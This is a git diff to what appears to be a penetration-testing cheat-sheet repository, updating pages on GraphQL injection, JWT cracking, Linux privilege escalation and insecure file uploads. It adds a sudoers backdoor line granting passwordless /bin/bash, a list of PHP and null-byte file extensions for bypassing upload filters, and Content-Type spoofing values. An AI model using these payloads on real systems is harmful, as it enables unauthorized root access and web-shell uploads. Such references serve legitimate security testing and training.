diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index caaf708..b684bc6 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) -* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) \ No newline at end of file +* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) +* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) \ No newline at end of file diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 9d83b6b..ccdb745 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -250,7 +250,7 @@ Secret is "Sn1f" ### Hashcat -> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065) +> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065) ```bash /hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e9d0aab..53f5588 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -84,7 +84,7 @@ * Checks if password hashes are stored in /etc/passwd * Extract full details for 'default' uid's such as 0, 1000, 1001 etc * Attempt to read restricted files i.e. /etc/shadow - * List current users history files (i.e .bash_history, .nano_history etc.) + * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) * Basic SSH checks * Privileged access: * Which users have recently used sudo @@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers # use SUDO without password echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers ``` - ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it @@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) -The following exploits are known to work well. +The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`. ### CVE-2016-5195 (DirtyCow) diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst new file mode 100644 index 0000000..b348161 --- /dev/null +++ b/Upload Insecure Files/Extension PHP/extensions.lst @@ -0,0 +1,20 @@ +.jpeg.php +.jpg.php +.png.php +.php +.php3 +.php4 +.php5 +.php7 +.pht +.phar +.phpt +.pgif +.phtml +.phtm +.php%00.gif +.php\x00.gif +.php%00.png +.php\x00.png +.php%00.jpg +.php\x00.jpg \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index e0e7bb0..82347ce 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm ### Upload tricks -- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` +- Null byte (works well against `pathinfo()`) + * .php%00.gif + * .php\x00.gif + * .php%00.png + * .php\x00.png + * .php%00.jpg + * .php\x00.jpg - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` + * `Content-Type : image/gif` + * `Content-Type : image/png` + * `Content-Type : image/jpeg` ### Picture upload with LFI